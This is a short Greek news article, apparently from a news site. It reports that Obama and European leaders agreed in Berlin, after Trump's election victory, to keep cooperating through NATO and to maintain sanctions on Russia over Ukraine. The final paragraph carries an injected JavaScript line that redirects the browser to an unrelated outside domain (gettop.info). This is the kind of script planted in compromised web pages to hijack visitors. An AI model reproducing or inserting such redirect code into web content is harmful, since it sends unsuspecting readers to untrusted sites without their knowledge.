Τα «βρήκαν» Ομπάμα και Ευρωπαίοι για ΝΑΤΟ και Ρωσία

0
4

 

Ο πρόεδρος των ΗΠΑ Μπαράκ Ομπάμα και οι Ευρωπαίοι ηγέτες συμφώνησαν στο Βερολίνο ότι είναι ανάγκη να συνεχίσουν να συνεργάζονται στο πλαίσιο πολυμερών οργανισμών όπως το ΝΑΤΟ και να προωθήσουν τη διατλαντική ατζέντα, όπως αναφέρει χαρακτηριστικά σε δήλωσή του ο Λευκός Οίκος.

Αυτή η κοινή θέση τους ανακοινώνεται μετά την εκλογική νίκη στις ΗΠΑ του ρεπουμπλικανού προεδρικού υποψηφίου Ντόναλντ Τραμπ, ο οποίος είπε στη διάρκεια της προεκλογικής εκστρατείας του πως, αν η Ρωσία επιτεθεί σ’ ένα μέλος του ΝΑΤΟ, αυτός θα εξετάσει αν η χώρα στόχος είχε εκπληρώσει τις αμυντικές δεσμεύσεις της, πριν της παράσχει στρατιωτική βοήθεια.

«Οι ηγέτες συμφώνησαν στην ανάγκη να εργασθούν συλλογικά για να προωθήσουν τη διατλαντική ατζέντα, ιδιαίτερα για να φέρουν τη σταθεροποίηση στη Μέση Ανατολή και τη Βόρεια Αφρική, καθώς και για να εξασφαλίσουν τη διπλωματική διευθέτηση των συγκρούσεων στη Συρία και την ανατολική Ουκρανία», αναφέρει στη δήλωσή του ο Λευκός Οίκος.

«Οι ηγέτες υπογράμμισαν επίσης τη σημασία που έχει το να συνεχιστεί η συνεργασία μέσω πολυμερών θεσμών, περιλαμβανομένου του ΝΑΤΟ», πρόσθεσε ο Λευκός Οίκος.

Σύμφωνα με ανάρτηση στο Twitter του ρωσικού τηλεοπτικού δικτύου rt.com οι Eυρωπαίοι ηγέτες και ο Αμερικανός πρόεδρος συμφώνησαν να διατηρήσουν τις κυρώσεις στη Ρωσία για το ζήτημα της Ουκρανίας. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here